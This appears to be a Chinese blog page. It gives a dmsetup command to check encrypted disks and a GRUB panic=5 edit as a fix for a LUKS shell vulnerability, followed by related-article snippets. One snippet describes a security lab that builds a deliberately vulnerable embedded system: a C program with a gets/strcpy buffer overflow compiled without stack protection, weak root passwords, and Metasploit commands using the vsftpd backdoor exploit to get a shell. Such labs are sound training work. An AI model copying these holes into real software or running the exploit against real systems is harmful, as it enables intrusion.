Linux 磁盘高危漏洞 - 1

检测与修复加密磁盘
最新推荐文章于 2025-04-24 07:00:00 发布
原创 最新推荐文章于 2025-04-24 07:00:00 发布 · 804 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

本文提供了一种检测加密磁盘状态的方法,并分享了一个简单的修复案例。通过 dmsetupstatus 和 awk 命令组合,可以检查加密磁盘是否正常工作。如果出现问题,可以通过修改 grub 配置文件来尝试修复。

参考: http://www.cnbeta.com/articles/558923.htm

  • 检测命令
dmsetup status | awk 'BEGIN {FS=":"} ; /crypt\s*$/ {print "Encrypted: " $1}'

# 返回空代表正常
  • 修复
sed -i 's/GRUB_CMDLINE_LINUX_DEFAULT="/GRUB_CMDLINE_LINUX_DEFAULT="panic=5 /' /etc/default/grub grub-install

这里写图片描述

有兴趣可以参考下
http://nolinux.blog.51cto.com/4824967/1436460
进行测试。

不过笔者进行了简单的创建、挂载测试,没有复现。

深度剖析 CVE-2025-3466:Langgenius Dify 代码节点未净化输入导致的高危任意代码执行漏洞
athink_cn的博客
07-08 2281
Dify AI平台曝高危漏洞CVE-2025-3466,允许任意代码执行。漏洞源于代码执行顺序错误,导致沙箱安全机制被绕过,攻击者可覆盖全局函数获取root权限。PoC显示能执行系统命令、窃取敏感数据。修复方案包括调整执行顺序、保护全局函数等。建议用户立即升级至1.1.3版本,并采取网络隔离等措施。该漏洞警示安全设计需重视细节,任何微小疏忽都可能造成严重后果。
扒一扒过去一年K8S高危漏洞都有哪些?
力哥讲技术
03-13 1899
在过去的一年里,Kubernetes继续稳固其在关键基础设施领域的地位,成为无论是小型还是大型组织都广受欢迎的选择。然而,随着更多开发人员将Kubernetes部署与其他云原生组件相结合,构建出更加完善的工作系统时,这也使得Kubernetes更容易遭受攻击。更多的组件和更加复杂的基础架构也增加了易受攻击的范围,这是需要我们运维人员关注的。根据 Red Hat 的2022 年 Kubernetes 安全状况报告:https://www.redhat.com/rhdc/managed-files/cl-sta
按键70秒,Root轻松得:Linux惊现高危漏洞
snow2know的博客
12-09 866
导读 E安全1116日讯 Linux被发现高危漏洞(CVE-2016-4484),攻击者可以通过持续按下Enter键70秒钟来获取 root initramfs shell,进而破坏Linux boxes。漏洞存在于Linux流行变体中的统一密钥设置(LUKS)。通过访问shell,攻击者可以解密Linux机器。该攻击也适用于云端的虚拟Linux boxes。 该漏洞影响Ubuntu,Fedo
Linux内核高危提权漏洞,这些版本快升级
Chinese_big_boy的博客
08-26 426
据介绍,本地用户可以将自己的数据注入敏感的只读文件,消除限制或修改配置以获得更高的权限。有研究人员通过利用该漏洞修改 /etc/passwd 文件进行了举例,修改后可直接取消 root 用户的密码,然后普通用户使用 su root 命令即可获得 root 账户的访问权限。Max 表示,“脏管道”漏洞与几年前的“脏牛”类似,所以采用了相似的名字,不过前者更容易被利用。因为非特权进程可以将代码注入 root 进程。最后,建议各位检查所使用的 Linux 服务器的内核版本,若是 5.8 以上的版本请尽快升级。..
dmsetup命令
qq_42533216的博客
06-23 4518
A.2. DMSETUP 命令 命令是一个用来与 Device Mapper 沟通的命令行封装器(wrapper)。可使用 命令的 、、 和 选项查看 LVM 设备的常规信息,如以下小节所述。有关 命令的额外选项和功能,请参考 (8) man page。 命令提供有关 Device Mapper 设备概述。如果没有指定设备名称,则输出所有目前配置的 Device Mapper 设备信息。如果指定了设备,那么这个命令只会生成该设备信息。 命令提供以下分类信息:设备名称。LVM 设备以用小横线分隔的卷
device mapper的使用
热门推荐
RichardYSteven的专栏
09-03 1万+
http://www.ibm.com/developerworks/cn/linux/l-devmapper/index.html 这个页面讲了点原理,可以看一下。 dmsetup命令 显示当前的device mapper的信息 dmsetup ls dmsetup info dmsetup status 显示设备的依赖关系 dmsetup deps sda
linux dmsetup用法,linux 命令 -- dmsetup
weixin_31347649的博客
05-13 4206
demsetup 个人理解dmsetup 是low level logical volume management。我理解的意思是,这是一个更加底层的逻辑卷管理工具。平时我们管理linux 上的逻辑卷,使用lvm相关的工具即可。lvs是更高级的管理逻辑卷的命令,但是,有时候会出现类似lvm 删除不掉的lvm分区。我们可以使用dmsetup 去删除。demsetup 命令语法dmsetup info...
VMware紧急告警:VMSA-2025-0004修复ESXi、Workstation 和 Fusion 等多个在野使用漏洞
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
03-15 1534
VMware紧急告警:VMSA-2025-0004修复ESXi、Workstation 和 Fusion 等多个在野使用漏洞
使用 OWASP Dependency-Check 扫描 Spring Framework 漏洞
洛秋的博客
12-27 665
这个配置专门针对 Spring Framework 的 CVE-2024-22243 漏洞检测进行了优化,同时也会扫描其他潜在的安全问题。
Linux系统之dmsetup详解
weixin_56303229的博客
04-24 738
dmsetup 是一个用于管理基于设备映射器(device-mapper)驱动的逻辑设备的低级工具。设备映射器是 Linux 内核中用于创建虚拟块设备的核心组件,广泛应用于逻辑卷管理(LVM)、加密设备(如 dm-crypt)和 RAID 等场景。通过 dmsetup,用户可以创建、删除、修改、挂起和恢复设备映射器设备,并查看其状态和相关信息。每个逻辑设备由一个表(table)定义,该表为逻辑设备的每个扇区(512 字节)指定一个目标(target)。
格式化磁盘
aolitianya的博客
03-20 194
linux上格式化一个曾经的系统磁盘
dmsetup--device mapper 管理工具(误删除逻辑卷lvm设备文件处理方法)
gary.guo
03-16 5863
dmsetup 命令 一、介绍 Mapped Device 是一个逻辑抽象,可以理解成为内核向外提供的逻辑设备,它通过Mapping Table描述的映射关系和Target Device建立映射。Target device表示的是Mapped Device所映射的物理空间段,对Mapped Device所表示逻辑设备来收,就是该逻辑设备映射到的一个物理设备。 Mapping Table里有 Mapped Device 逻辑的起始地址、范围、和表示在 Target Device 所在物理设备的地址偏移量以
Linux Command dmsetup管理LVM
爱死亡机器人
04-16 6768
介绍 dmsetup 命令是一个用来与 Device Mapper 沟通的命令行封装器(wrapper)。可使用 dmsetup 命令的 info、ls、status 和 deps 选项查看 LVM 设备的常规信息,如以下小节所述。 语法 dmsetup + <command> + <device_name> or <uuid> # command 常见的有 remove 、 ls 、status 等 # device_name: 可以是/dev/sd*,或者是物理卷
无法创建文件系统以及无法创建PV时怎么办?
weixin_34146410的博客
07-23 942
我们平常对磁盘分区格式化的时候有时无法格式化,报告的信息为:“/dev/sdb3isapparentlyinusebythesystem;willnotmakeafilesystemhere!”意思是说:似乎系统正在使用该设备,无法创建文件系统。使用【mount】查看系统的所有挂载设备,也没有:/dev/sdb3.但是,创建文件系统的时候。就...
dmsetup命令使用
wu_wu2009的专栏
08-26 7515
[root@bdwg mapper]# dmsetup ls VolGroup01-lvol_bdwg04  (253, 11) VolGroup01-lvol_bdwg03  (253, 10) VolGroup01-lvol_bdwg02  (253, 9) VolGroup01-lvol_bdwg01  (253, 8) VolGroup01-lvol_systemproc    
dmsetup 手册
baicaiCCL的博客
05-01 3237
dmsetup SYNOPSIS dmsetup clear device_name dmsetup create device_name [-u|–uuid uuid] [–addnodeoncreate|–addnodeonresume] [-n|–notable|–table table|table_file] [–readahead [+]sectors|auto|none] dmsetu...
【openeuler 21.3】格式化磁盘提示被系统占用
lucky_fd的博客
12-23 6339
#格式化磁盘提示被系统占用 [root@localhost /]# mkfs -t ext4 /dev/sda3 mke2fs 1.45.6 (20-Mar-2020) /dev/sda3 有一个 LVM2_member 文件系统 Proceed anyway? (y,N) y /dev/sda3 显然正被系统使用; 取消建立 文件系统 ! sdc的信息如下,sdc被当做系统挂盘用过,所以sdc里有swap分区 原因/dev/sdc里的交换分区正在被DM管理,可以手动移除 使用dmsetup s
linux运行brook,linux命令----dmsetup
weixin_39577422的博客
05-01 630
查看dm设备信息命令。[root@cnsz031722 ~]#dmsetup lsmpath2(253, 8)VolGroup02-LVcustomer(253, 11)VolGroup00-LVwls(253, 5)VolGroup04-lv_ldap4(253, 15)VolGroup00-LVtmp(253, 2)app_customer_lun04(253, 10)VolGroup00-L...
linux不能创建分区表,解决Linux中分区之后不能创建文件系统
weixin_42499159的博客
05-05 664
1.使用fdisk成功创建主分区/dev/sdb1,查看/proc/partitions中的分区信息[root@localhost ~]# cat /proc/partitionsmajor minor #blocks name8 0 20971520 sda8 1 512000 sda18 2 20458496 sda28 ...
1. 更新系统包列表 sudo apt update 解析:此命令用于更新本地的软件包列表,确保安装的是最新版本的QEMU。apt update会从配置的软件源(repository)中获取最新的软件包信息,包括可用的软件包、版本号以及依赖关系等。 2. 安装QEMU sudo apt install qemu 解析:使用apt包管理器安装QEMU模拟器。 3. 验证QEMU安装 qemu-system-x86_64 --version 解析:检查QEMU是否安装成功,并显示其版本信息。qemu-system-x86_64是QEMU的一个命令行工具,用于模拟x86_64架构的处理器和系统。--version选项会显示QEMU的版本信息。 4. 下载Ubuntu镜像文件 wget https://releases.ubuntu.com/20.04/ubuntu-20.04-live-server-amd64.iso 解析:从Ubuntu官方网站下载20.04版本的服务器版ISO镜像文件。 5. 创建磁盘镜像文件 qemu-img create -f qcow2 ubuntu.qcow2 20G 解析:创建一个20GB的qcow2格式磁盘镜像文件,用于安装Ubuntu系统。qemu-img是QEMU提供的磁盘镜像管理工具,create子命令用于创建新的磁盘镜像文件。-f qcow2指定镜像文件的格式为qcow2,这是一种支持动态分配和快照等高级功能的磁盘镜像格式。ubuntu.qcow2是创建的镜像文件名,20G指定镜像文件的大小为20GB,可以根据实验需求设置。 6. 启动QEMU并安装Ubuntu qemu-system-x86_64 -hda ubuntu.qcow2 -cdrom ubuntu-20.04-live-server-amd64.iso -boot d -m 2048 解析:启动QEMU,使用之前创建的磁盘镜像文件ubuntu.qcow2和下载的ISO镜像文件ubuntu-20.04-live-server-amd64.iso,分配2GB内存,从CD-ROM启动以安装Ubuntu。-hda选项指定QEMU模拟的第一个硬盘设备为ubuntu.qcow2,-cdrom选项指定QEMU模拟的CD-ROM设备为下载的ISO镜像文件,-boot d选项指定启动顺序为从CD-ROM启动,-m 2048选项指定分配给QEMU模拟器的内存大小为2048MB(即2GB)。 7. 按照Ubuntu安装向导完成安装 解析:在QEMU窗口中Ubuntu的安装界面按照向导步骤进行操作,包括选择语言、时区、键盘布局、设置用户名和密码等,与在物理机上安装Ubuntu系统类似。 8. 重启QEMU并登录Ubuntu系统 qemu-system-x86_64 -hda ubuntu.qcow2 -m 2048 解析:安装完成后要重启QEMU以进入新安装的Ubuntu系统。使用与之前相同的命令启动QEMU,不再需要-cdrom和-boot d选项,使用之前设置的用户名和密码登录Ubuntu系统就可以开始使用了。 9. 构建嵌入式系统 步骤1:安装依赖工具 sudo apt update sudo apt install -y git build-essential qemu-system-arm binwalk python3-pip pip3 install pycrypto 步骤2:构建嵌入式系统 # 下载Buildroot(2023.02稳定版) wget https://buildroot.org/downloads/buildroot-2023.02.1.tar.gz tar xvf buildroot-2023.02.1.tar.gz cd buildroot-2023.02.1 # 配置基础系统 make qemu_arm_vexpress_defconfig make menuconfig # 关键配置 Target packages → [*] vsftpd (选中) [*] Enable insecure options (允许弱密码) System configuration → (insecure) Root password (设置弱密码) Filesystem images → [*] ext2/3/4 root filesystem 步骤3:植入漏洞组件 # 创建漏洞程序/root/vuln_ftp.c:(以下为C语言代码) #include <stdio.h> #include <string.h> void vulnerable(char *input) { char buffer[64]; strcpy(buffer, input); // 缓冲区溢出点 } int main() { char input[256]; printf("FTP> "); gets(input); // 高危函数 vulnerable(input); return 0; } # 编译到文件系统 arm-linux-gnueabi-gcc vuln_ftp.c -o output/target/root/ftp_server -fno-stack-protector #禁用栈保护 -z execstack -static 步骤4:编译并启动系统 make -j$(nproc) # 编译约30分钟 qemu-system-arm -M vexpress-a9 -kernel output/images/zImage -dtb output/images/vexpress-v2p-ca9.dtb -drive file=output/images/rootfs.ext2,if=sd,format=raw -append "console=ttyAMA0 root=/dev/mmcblk0" -net nic -net user,hostfwd=tcp::2121-:21 -serial stdio -nographic 实验产出 (1)系统镜像:buildroot-2023.02.1/output/images/rootfs.ext2 (2)攻击验证脚本 # 在Kali中执行 msfconsole -q use exploit/unix/ftp/vsftpd_234_backdoor set RHOST 192.168.1.100 set PAYLOAD cmd/unix/interact exploit 解析:通过Metasploit利用vsftpd后门漏洞获取shell。 (3)分析报告(样例) 内核版本:Linux 5.15.82 文件系统:ext4 (256MB) 植入漏洞- FTP服务(vsftpd 3.0.5) - 自定义漏洞程序(/root/ftp_server) 安全风险: - 弱密码 root/insecure - 未启用ASLR (/proc/sys/kernel/randomize_va_space=0) - 漏洞程序禁用栈保护 给出完整步骤
最新发布
11-17
// 高危函数 vulnerable(input); return 0; } ``` **编译到文件系统**: ```bash arm-linux-gnueabi-gcc vuln_ftp.c -o output/target/root/ftp_server \ -fno-stack-protector -z execstack -static ``` ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值